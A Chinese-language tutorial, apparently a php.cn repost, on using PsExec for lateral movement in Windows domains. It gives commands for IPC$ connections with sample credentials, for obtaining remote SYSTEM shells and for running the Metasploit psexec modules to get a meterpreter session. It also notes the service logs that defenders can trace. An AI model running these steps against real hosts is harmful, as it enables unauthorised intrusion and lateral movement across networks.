psexec 是用于批量维护 windows 主机的强大工具,尤其在域环境下表现出色。由于 psexec 是 windows 提供的工具,杀毒软件通常将其列入白名单。
通过 PsExec,可以在不使用远程桌面(RDP)的情况下,通过命令行与目标机器建立连接,并控制目标机器。
PsExec 是 PsTools 工具包的一部分,下载地址为:https://www.php.cn/link/9092e7bee2d622e7c6c5ef8476928917
利用 PsExec,可以在远程目标主机上执行命令,并将管理员权限提升至 System 权限以运行指定程序。
PsExec 的基本原理是通过管道在远程目标主机上创建一个 psexec 服务,并在本地磁盘生成一个名为“PSEXESVC”的二进制文件,然后通过 psexec 服务运行命令,命令执行完毕后删除服务。
PsExec 的使用
首先,需要获取目标操作系统的交互式 Shell。在建立了 ipc$ 的情况下:
net use \192.168.3.21 /u:god�dministrator Admin12345
登录后复制
执行如下命令,获取 System 权限的 Shell:
PsExec.exe -accepteula \192.168.3.21 -s cmd.exe
# -accepteula 第一次运行 PsExec 会弹出确认框,使用该参数就不会弹出确认框
# -s 以System权限运行远程进程,获得一个System权限的交互式Shell,如果不用这个参数,那么会获得一个administrator权限的shell
登录后复制
获得一个 administrator 权限的 shell:
PsExec.exe -accepteula \192.168.3.21 cmd.exe
登录后复制
如果没有建立 ipc$,PsExec 有两个参数可以通过指定的账号和密码进行远程连接:
PsExec.exe \192.168.3.21 -u god�dministrator -p Admin12345 cmd.exe
# -u 域用户名
# -p 密码
登录后复制
使用 PsExec 在远程计算机上执行命令进行回显:
PsExec.exe \192.168.3.21 -u god�dministrator -p Admin12345 cmd /c "ipconfig"
登录后复制
PsExec 的注意事项
需要远程系统开启 admin 共享(默认是开启的),原理是基于 IPC 共享,目标需要开放 445 端口和 admin。
在使用 IPC 连接目标系统后,不需要输入账户和密码。
在使用 PsExec 执行远程命令时,会在目标系统中创建一个 psexec 服务。命令执行完后,psexec 服务将被自动删除。由于创建或删除服务时会产生大量的日志,可以在攻击溯源时通过日志反推攻击流程。
使用 PsExec 可以直接获得 System 权限的交互式 Shell(前提目标是 administrator 权限的 shell)。
在域环境测试时发现,非域用户无法利用内存中的票据使用 PsExec 功能,只能依靠账号和密码进行传递。
Metasploit 使用 PsExec 模块
查找有关 psexec 的模块:
有两个常用的模块:
exploit/windows/smb/psexec
exploit/windows/smb/psexec_psh(Powershell 版本的 psexec)
登录后复制
使用模块:
use exploit/windows/smb/psexec
set rhosts 192.168.2.25
set smbuser administrator
set smbpass Admin12345
登录后复制
运行 exploit,运行脚本会获得一个 meterpreter:
输入 shell,会获得一个 system 权限的 shell:
psexec_psh 模块和 psexec 模块的使用方法相同,二者的区别在于,通过 psexec_psh 模块上传的 payload 是 powershell 版本的。
参考文章:
https://www.php.cn/link/004dbbb73c0e3933d191fa195500d018
以上就是横向移动 - PsExec 的使用的详细内容,更多请关注php中文网其它相关文章!
868
收藏
